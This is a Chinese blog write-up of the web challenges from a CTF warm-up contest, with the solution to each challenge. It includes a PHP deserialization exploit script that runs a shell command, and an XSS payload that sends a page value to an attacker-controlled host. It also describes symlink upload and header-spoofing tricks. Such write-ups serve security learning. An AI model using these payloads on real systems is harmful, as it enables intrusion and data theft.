XSCTF 联合招新赛(热身赛)WEB部分wp

最新推荐文章于 2023-11-08 09:38:29 发布
最新推荐文章于 2023-11-08 09:38:29 发布
阅读量978 收藏 2
点赞数
分类专栏: 比赛 文章标签: php web安全 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/127453967
版权

头头是道

直接就找到了。(这种题出的没啥意义)
在这里插入图片描述

warm_up

从本地来并且需要来自jiaran BiliBili Home Page。
用X-Forwarded-For和Referer直接过了就好。
在这里插入图片描述

updater

刚开始卡了几分钟,感觉上传的压缩包没一点作用,一直看到哪个readme,还以为是要读取呢。
之后发现有一个README.md文件,以这个文件为突破点,直接传入一个名字为README.md的软连接就好,连接到/flag,然后压缩上传。
在这里插入图片描述
在这里插入图片描述

ezser

基本可以说是最简单的反序列化了,没有过滤。
exp

<?php
class Fxizenta{
    public $b;
    public function __construct()
    {
        $this->b=new Need;
    }
}
class Need{
    public $cmd;
    public function __construct(){
        $this->cmd='cat flag.php';
    }
}
class girlfriend{
    public $a;
    public function __construct(){
        $this->a=new Fxizenta;
    }
}
$a=new girlfriend();
echo urlencode(serialize($a));

在这里插入图片描述

EZphp

简简单单的php代码绕过。
只需要知道extract的变量覆盖作用,以及file_get_contents与php://input的搭配作用即可。
在这里插入图片描述

babyxss

刚开始本来就已经想到了,但是本能的以为还是盗取cookie,然后伪造身份。之后发现本题根本就没有cookie,然后admin的页面有flag,我直接构造一个payload,可以直接得到flag的值就好。
payload:

<script>new Image().src="http://ip:9999/"+document.getElementById("flag").value;</script>

在这里插入图片描述
这个比赛我今天下午七点多才知道,可惜了。(但是比赛web题目有点水)

f0njl
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
bugku ctf web8 (txt????)
qq_42777804的博客
08-02 646
进去网站 是如下的源码 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!<...
main_逻辑回归_随机梯度_华为软件精英热身赛_随机梯度下降_
10-03
用时22s,准确率94%算法为批量随机梯度下降
XSCTF联合招新-[中等] QR1
Welcome To Myon'Blog !
12-18 697
攻防世界 [中等] QR1 一张空白的图片 XSCTF联合招新
第二届SWCTF部分WP
Welcome To Myon'Blog !
04-25 982
SWCTF、web、密码学、misc杂项、pyc反编译...
[XSCTF]easyxor
ASV大宝的博客
02-05 649
打开界面定位找到了关键函数,大致的分析,写在了源码上面了理解了大致的加密流程之后,开始写WP1、输入字符串与key进行异或,得到结果数组A2、将数组A每一个元素拆分为1或0,存储在s数组3、将s数组与r数组进行比较只要把思路逆过来,就可以写wp
XSCTF联合招新-热身赛(部分WP)
SwBack的博客
10-22 1559
由于没有多少时间答题,抽空在划水的时候做了一两道题目.比已经结束了24小时了。特把写的WP分享一下,欢迎各位大佬进行指点。
XSCTF联合招新热身赛)babystack & easyrop
红叶的博客
10-29 1599
开启了栈不可执行,但是在 IDA Pro 中发现了backdoor函数。
攻防世界-XSCTF联合招新
Welcome To Myon'Blog !
12-08 1950
攻防世界-XSCTF联合招新 1、凯撒大帝在培根里藏了什么 2、简单的base编码 3、删库跑路-
攻防世界_XSCTF联合招新(初)_不确定,再看看
qq_47875210的博客
11-10 2150
先给了,一个音频,拖到SilentEye报错了。我就去看文件格式了,大概是看到了一个base的特征,再加上出题人说的base64,肯定是提取这个音频里面的base64了。这是个假的旗帜,让我去看base,既然是base64,第一想法base64隐写喽。,key给没给我不清楚,不太会c语言,加上这个排版,我更懒得看代码了。直接写脚本爆破key就好了,没有库的要先安装一下,命令行。,右边的Release下载即可食用~​ 1.提取base64文本。,自然而然想到仿射密码了。末尾给了加密后的密文。
XSCTF联合招新【Simple-Math】(MSIC+Crypto)
小谢的博客
11-28 1246
XSCTF联合招新【Simple-Math】(MSIC+Crypto)
2020年NOC编程猫热身赛Kitten多项选择题模拟题附答案
03-30
2020年NOC编程猫热身赛Kitten多项选择题模拟题附答案
ACM热身赛.xmind
最新发布
11-23
ACM热身赛.xmind
ACM上海网上热身赛题目
02-21
该资源主要是从上海网上下载的ACM 热身赛 题目
热身赛题说明03091
08-08
热身赛题说明03091
成都大学ACM热身赛
09-19
成都大学ACM热身赛,这个资源很好,这个软件必须在Visual C++环境下运作。
攻防世界 不确定,再看看
wobushilijiatu的博客
11-08 341
之前做题目 也遇见过这种情况 就是一句一句base64解码可以解的出来 放一起解不出来 这种可能是base64隐写 我们直接上 大佬的工具 或者脚本 都可以。根据题目 提示 我们肯定要把这个 base64文本提取出来 直接上脚本。得到一个音频文件 拖进 audacity 分析。发现没什么用 我们拖进 010 里面看看。提出来很多base64 字符 解码一下。得到flag提交成功。
攻防世界 xctf -Guess writeup
小傅
07-17 1242
本题的解析官网上有,这里是一个自动化的脚本,完成的是自动上传一个ant.jpg的文件(ant.jpg是一个ant.zip压缩包重命名的文件,里面是一个ant.php的一句话木马)。运行返回的是在web后台这个文件重命名后的文件的url。可通过zip伪协议访问这个木马。 这个脚本运行需要3个在linux下运行的脚本文件(因为php伪随机数的破解用了一些工具,还有一些php代码)。脚本文件有:猜解随...
XSCTF联合招新【真是阳间题】(MSIC+Crypto)
小谢的博客
11-28 1325
XSCTF联合招新【真是阳间题】(MSIC+Crypto)
CTF之XSSEE
Unitue_逆流
02-06 3286
解题链接: http://ctf5.shiyanbar.com/basic/xss/ 1、打开链接,将代码复制粘贴到xssee网站中解答,直接进行解码。 2、直接点击Unescape进行解码。 3、对蓝色部分进行解码,复制粘贴到另一个页面进行解码。 4、第三步解码得到如下: 5、使用UTF7 Decode进行解码。 6、输入key的值。 7、查看源代码,得到ke
写一个篮球宣传片脚本
03-30
场景:一个篮球场,球场上有两支队伍正在比。 主持人:大家好,欢迎来到这场精彩的篮球比!今天我们有两支顶尖的球队,他们会为我们带来一场令人难以忘怀的比! (球场上球员们正在热身,跑动、投篮等) 主持人:这两支球队都是篮球界的强者,他们有着出色的球技和超强的团队合作能力,他们的比总是充满了激情和不可预测性。 (镜头切换到两支球队,球员们在场上互相磨合,默契配合,掀起了一波又一波的进攻和防守) 主持人:这些球员们不仅拥有出色的篮球技巧,还有着坚韧不拔的精神和永不放弃的信念,在球场上他们会全力以赴,不留余力地为我们带来精彩的比。 (球场上比正酣,球员们竭尽全力,观众们欢呼着为他们加油) 主持人:让我们一起见证这场篮球盛宴,感受这种热血沸腾的运动魅力,感受这些球员们为了篮球梦想奋斗的精神,在这里,我们一起追逐梦想,一起挑战极限! (镜头切换到球场上,球员们正在比,观众们兴奋地为他们呐喊) 主持人:这就是篮球,这就是运动,让我们一起燃起激情,一起为这场比加油! (画面渐渐变暗) 主持人:感谢大家的观看,我们下次再见!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值